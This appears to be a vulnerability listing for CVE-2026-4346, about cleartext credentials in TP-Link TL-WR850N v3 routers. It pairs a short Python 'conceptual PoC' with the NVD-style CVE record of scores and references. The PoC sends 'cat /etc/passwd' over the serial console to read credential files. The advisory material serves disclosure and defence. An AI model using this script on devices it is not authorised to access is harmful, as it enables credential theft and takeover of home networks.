CVE-2026-4346

import serial import time # Conceptual PoC for reading serial data # Target: TP-Link TL-WR850N v3 Serial Interface def exploit_serial(target_port='/dev/ttyUSB0', baud_rate=115200): try: # Connect to the serial port ser = serial.Serial(target_port, baud_rate, timeout=1) print(f"[+] Connected to {target_port} at {baud_rate} baud") # Wait for boot or prompt time.sleep(2) # Attempt to bypass weak auth or read memory (conceptual) # In a real scenario, specific commands like 'cat /etc/config/wireless' or 'printenv' would be used payload = b"cat /etc/passwd\n" # Example command to read credentials ser.write(payload) time.sleep(1) # Read response while ser.in_waiting > 0: response = ser.readline().decode('utf-8', errors='ignore') if response: print(response.strip()) ser.close() print("[+] Exploit finished.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": exploit_serial()

{"cve": {"id": "CVE-2026-4346", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-03-26T22:16:31.590", "lastModified": "2026-03-31T19:09:22.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The vulnerability affecting TL-WR850N v3 allows cleartext storage of administrative and Wi-Fi credentials in a region of the device’s flash memory while the serial interface remains enabled and protected by weak authentication. An attacker with physical access and the ability to connect to the serial port can recover sensitive information, including the router’s management password and wireless network key.\n\nSuccessful exploitation can lead to full administrative control of the device and unauthorized access to the associated wireless network."}, {"lang": "es", "value": "La vulnerabilidad que afecta al TL-WR850N v3 permite el almacenamiento en texto claro de credenciales administrativas y de Wi-Fi en una región de la memoria flash del dispositivo mientras la interfaz serie permanece habilitada y protegida por una autenticación débil. Un atacante con acceso físico y la capacidad de conectarse al puerto serie puede recuperar información sensible, incluyendo la contraseña de administración del router y la clave de la red inalámbrica.\n\nLa explotación exitosa puede llevar al control administrativo total del dispositivo y al acceso no autorizado a la red inalámbrica asociada."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tl-wr850n_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.9.1_Build251205", "matchCriteriaId": "2990864C-564D-43BB-AD09-AF5B1126D728"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:tl-wr850n:3:*:*:*:*:*:*:*", "matchCriteriaId": "FBD8E210-0D1F-46D6-9FF3-05880A8877A2"}]}]}], "references": [{"url": "https://www.tp-link.com/in/support/download/tl-wr850n/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/us/support/faq/5034/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Vendor Advisory"]}]}}